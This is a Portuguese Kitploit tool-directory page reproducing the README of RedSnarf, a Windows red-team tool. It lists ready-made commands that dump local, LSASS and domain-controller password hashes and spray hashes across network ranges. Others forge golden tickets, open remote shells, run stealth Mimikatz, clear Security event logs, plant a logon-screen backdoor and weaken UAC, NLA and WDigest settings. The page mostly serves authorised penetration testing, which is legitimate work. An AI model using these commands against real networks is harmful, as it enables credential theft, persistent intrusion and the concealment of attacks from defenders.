Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
redsnarf — RedSnarf é uma ferramenta de pen-testing / red team para ambientes Windows. | Kitploit
Ferramentas/GitHubGitHub/nccgroup/redsnarf
Quebra de SenhasEscalada de PrivilégiosGeração de PayloadsExploraçãoAnálise de HashMovimento LateralColeta de InformaçõesPós-ExploraçãoTestes de PenetraçãoComando e ControleRed TeamingFerramenta de Acesso Remoto
1.2k235há 8 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHubnccgroup/redsnarf

redsnarf

RedSnarf é uma ferramenta de pen-testing / red team para ambientes Windows.

Ver RepositórioSite
root@kitploit:~
    ______           .____________                     _____  
\______   \ ____   __| _/   _____/ ____ _____ ________/ ____\ 
 |       _// __ \ / __ |\_____  \ /    \\__  \\_  __ \   __\  
 |    |   \  ___// /_/ |/        \   |  \/ __ \|  | \/|  |    
 |____|_  /\___  >____ /_______  /___|  (____  /__|   |__|    
        \/     \/     \/       \/     \/     \/         
                                  [email protected]
                                                  @redsnarf

GitHub license

RedSnarf é uma ferramenta de teste de penetração / equipe vermelha criada por Ed Williams para recuperar hashes e credenciais de estações de trabalho, servidores e controladores de domínio Windows usando Técnicas Seguras de OpSec.

Veja nosso Canal no YouTube para Vídeos https://www.youtube.com/channel/UCDGWRxpHo6d8y6qIeMAXnxQ

A funcionalidade do RedSnarf inclui:

• Recuperação de hashes SAM locais • Enumeração de usuários em execução com privilégios elevados de sistema e suas senhas lsa secrets correspondentes; • Recuperação de credenciais em cache do MS; • Pass-the-hash; • Identificar rapidamente combinações fracas e adivinháveis de nome de usuário/senha (padrão de administrator/Password01); • Capacidade de recuperar hashes em uma faixa; • Hash spraying - Credsfile aceitará uma mistura de pwdump, fgdump e nome de usuário e senha em texto simples separados por um espaço; • Despejo de Lsass para análise offline com Mimikatz; • Despejo de hashes de controlador de domínio usando NTDSUtil e recuperação de NTDS.dit para análise local; • Despejo de hashes de controlador de domínio usando o método drsuapi; • Recuperação da pasta Scripts e Policies de um controlador de domínio e análise por 'password' e 'administrator'; • Capacidade de descriptografar hashes cpassword; • Capacidade de iniciar um shell em uma máquina remota; • Capacidade de limpar os logs de eventos (aplicativo, segurança, configuração ou sistema); (Apenas versão interna) • Os resultados são salvos por host para análise. • Ativar/Desativar RDP em uma máquina remota. • Alterar a porta RDP de 3389 para 443 em uma máquina remota. • Ativar/Desativar NLA em uma máquina remota. • Encontrar onde os usuários estão logados em máquinas remotas. • Backdoor na Tela de Logon do Windows • Ativar/Desativar UAC em uma máquina remota. • Mimikatz furtivo adicionado. • Análise de hashes de domínio • Capacidade de determinar quais contas estão ativadas/desativadas • Tirar uma captura de tela da Área de Trabalho de Usuários Ativos Logados Remotamente • Gravar a Área de Trabalho de Usuários Ativos Logados Remotamente • Descriptografar CPassword do Windows • Descriptografar Senha do WinSCP • Obter SPNs de Usuário • Recuperar senhas WIFI de máquinas remotas

Uso do RedSnarf

Requisitos: Impacket v0.9.16-dev - https://github.com/CoreSecurity/impacket.git CredDump7 - https://github.com/Neohapsis/creddump7 Recuperação de Lsass usando procdump - https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx Netaddr (0.7.12) - pip install netaddr Termcolor (1.1.0) - pip install termcolor iconv - usado na análise de informações do Mimikatz localmente

Mostrar Ajuda ./redsnarf.py -h ./redsnarf.py --help

Recuperar Hashes Locais

Recuperar Hashes Locais de uma única máquina usando credenciais locais fracas e limpando o log de eventos de Segurança ./redsnarf.py -H ip=10.0.0.50 -uC security

Recuperar Hashes Locais de uma única máquina usando credenciais locais fracas e limpando o log de eventos de aplicativo ./redsnarf.py -H ip=10.0.0.50 -uC application

Recuperar Hashes Locais de uma única máquina usando credenciais de administrador local ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d .

Recuperar Hashes Locais de uma única máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com

Recuperar Hashes em uma faixa de rede usando credenciais de administrador local ./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d .

Recuperar Hashes em uma faixa de rede usando credenciais de administrador de domínio ./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com

Recuperar Hashes em uma faixa de rede usando credenciais de administrador de domínio ./redsnarf.py -H file=targets.txt -u administrator -p Password01 -d yourdomain.com

Hash Spraying

Borrifar Hashes em uma faixa de rede ./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d .

Recuperar Hashes em uma faixa de rede com login de domínio ./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d yourdomain.com

Verificar Credenciais Rapidamente ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password1 -d . -cQ y

Verificar Rapidamente Arquivo contendo nomes de usuário (-hS) e uma senha genérica (-hP) ./redsnarf.py -H ip=10.0.0.1 -hS /path/to/usernames.txt -hP PasswordToTry -cQ y

Recuperar Hashes de Domínio

Recuperar Hashes usando o método drsuapi (Mais rápido) Este método suporta uma flag opcional de -q y que consultará o LDAP e exibirá se as contas estão ativas ou desativadas ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hI y (-hQ y)

Recuperar Hashes usando NTDSUtil Este método suporta uma flag opcional de -q y que consultará o LDAP e exibirá se as contas estão ativas ou desativadas ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hN y (-hQ y)

Geração de Golden Ticket ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hT y

Coleta de Informações

Copiar a pasta Policies e Scripts de um Controlador de Domínio e analisar por password e administrator ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -uP y

Descriptografar Cpassword ./redsnarf.py -uG cpassword

Encontrar Usuário - Ao Vivo /redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eL user.name

Encontrar Usuário - Offline (pesquisa informações baixadas anteriormente) /redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eO user.name

Exibir Lista de Tarefas de NT AUTHORITY\SYSTEM /redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eT y

Capturar a Área de Trabalho de um Usuário Ativo Logado Remotamente /redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eS y

Diversos

Iniciar um Shell em uma máquina usando credenciais de administrador local ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -uD y

Iniciar um Shell em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uD y

Recuperar uma cópia do lsass para análise offline com Mimikatz em uma máquina usando credenciais de administrador local ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -hL y

Executar mimikatz furtivo, esta opção inicia um servidor web para servir um script powershell, que é ofuscado e codificado do lado da máquina, os dados não tocam no disco - as credenciais são grepped em um estilo fácil de ler e ecoadas de volta para a tela. ./redsnarf.py -H ip=192.168.198.162 -u administrator -p Password01 -cS y -hR y

Executar Comando Personalizado Exemplo 1 ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'net user'

Exemplo 2 - Aspas duplas precisam ser escapadas com
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'dsquery group -name "domain admins" | dsget group -members -expand'

Política de Token de Acesso Local Cria um arquivo batch lat.bat que você pode copiar e colar na máquina remota para executar, o que modificará o registro e habilitará ou desabilitará as configurações da Política de Token de Acesso Local. ./redsnarf.py -rL y

Wdigest Habilitar o valor de registro UseLogonCredential do Wdigest em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW e

Desabilitar o valor de registro UseLogonCredential do Wdigest em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW d

Consultar o valor de registro UseLogonCredential do Wdigest em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW q

UAC Habilitar o valor de registro UAC em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU e

Desabilitar o valor de registro UAC em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU d

Consultar o valor de registro UAC em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU q

Backdoor - Backdoor na Tela do Windows - Pressione Shift Esquerdo + Alt Esquerdo + Print Screen para ativar Habilitar o valor de registro Backdoor em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB e

Desabilitar o valor de registro Backdoor em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB d

Consultar o valor de registro Backdoor em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB q

AutoLogon Habilitar o valor de registro AutoLogon do Windows em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA e

Desabilitar o valor de registro AutoLogon do Windows em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA d

Consultar o valor de registro AutoLogon do Windows em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA q

Bloquear a sessão de usuário de uma máquina remota usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uL y

RDP

Habilitar RDP em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR e

Desabilitar RDP em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR d

Consultar o status do RDP em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR q

Alterar a Porta RDP de 3389 para 443 - Alterar a Porta RDP para 443 em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT e

Alterar a Porta RDP para o padrão 3389 em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT d

Consultar o Valor da Porta RDP em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT q

Habilitar Multi-RDP com Mimikatz ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uR y

Habilitar RDP SingleSessionPerUser em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM e

Desabilitar RDP SingleSessionPerUser em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM d

Consultar o status do RDP SingleSessionPerUser em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM q

NLA

Habilitar NLA em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN e

Desabilitar NLA em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN d

Consultar o status do NLA em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN q

Baixar ferramenta